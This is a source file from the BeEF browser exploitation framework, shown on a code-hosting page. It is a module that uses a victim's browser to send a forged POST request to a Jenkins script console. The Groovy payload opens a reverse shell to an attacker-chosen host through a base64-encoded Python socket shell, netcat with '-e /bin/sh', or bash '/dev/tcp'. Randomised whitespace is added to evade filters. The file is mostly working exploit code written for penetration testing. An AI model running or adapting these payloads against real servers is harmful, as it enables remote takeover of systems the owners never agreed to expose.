Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/exploits/jenkins_groovy_code_exec/command.js
1154 views
1
//

2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6


7
beef.execute(function() {

8
  var rproto = '<%= @rproto %>';

9
  var rhost = '<%= @rhost %>';

10
  var rport = '<%= @rport %>';

11
  var targeturi = '<%= @uri %>';

12
  var lhost = '<%= @lhost %>';

13
  var lport = '<%= @lport %>';

14
  var target = rproto + '://' + rhost + ':' + rport + targeturi + '/script';

15
  var timeout = 15;

16
  var payload_name = '<%= @payload %>';

17
  var peer = rhost + ':' + rport;

18


19
  cleanup = function() {

20
    try {

21
      document.body.removeChild(jenkins_groovy_code_exec_iframe_<%= @command_id %>);

22
    } catch(e) {

23
      beef.debug("Could not remove iframe: " + e.message);

24
    }

25
  } 

26
  setTimeout("cleanup()", timeout*1000);

27


28
  payload = function() {

29
    var whitespace = '';

30
    for (var i=0; i<Math.floor(Math.random()*10)+3; i++) whitespace += ' ';

31
    var payload = '';

32
    switch (payload_name) {

33
      case "reverse_python":

34
        var cmd = "import socket,subprocess,os;host=\""+lhost+"\";port="+lport+";s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"

35
        cmd = cmd.replace(/,/g, whitespace+','+whitespace).replace(/;/g, whitespace+';'+whitespace)

36
        var encoded_cmd = btoa(cmd);

37
        payload = 'proc = [ "/usr/bin/python" , "-c" , "exec ( \''+encoded_cmd+'\'.decode ( \'base64\' ) )" ].execute()';

38
        payload = payload.replace(/ /g, whitespace);

39
        break;

40
      case "reverse_netcat":

41
        payload = 'proc = [ "/bin/nc" , "' + lhost + '" , "' + lport + '" , "-e" , "/bin/sh" ].execute()';

42
        payload = payload.replace(/ /g, whitespace);

43
        break;

44
      default: // "reverse_bash"

45
        payload = 'proc = [ "/bin/bash", "-c", "/bin/bash -i >& /dev/tcp/' + lhost + '/' + lport + ' 0>&1" ].execute()';

46
        payload = payload.replace(/ /g, whitespace);

47
        break;

48
    }

49
    return payload

50
  }

51


52
  exploit = function() {

53
    var groovy = payload();

54
    beef.debug(peer + " - Sending payload (" + groovy.length + " bytes)");

55
    var jenkins_groovy_code_exec_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", "application/x-www-form-urlencoded",

56
    [

57
      {'type':'hidden', 'name':'script', 'value':groovy },

58
      {'type':'hidden', 'name':'Submit', 'value':'Run' },

59
    ]);

60
    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

61
  }

62


63
  try {

64
    exploit();

65
  } catch(e) {

66
    beef.debug(peer + " - Exploit failed: " + e.message);

67
  }

68


69
});

70


71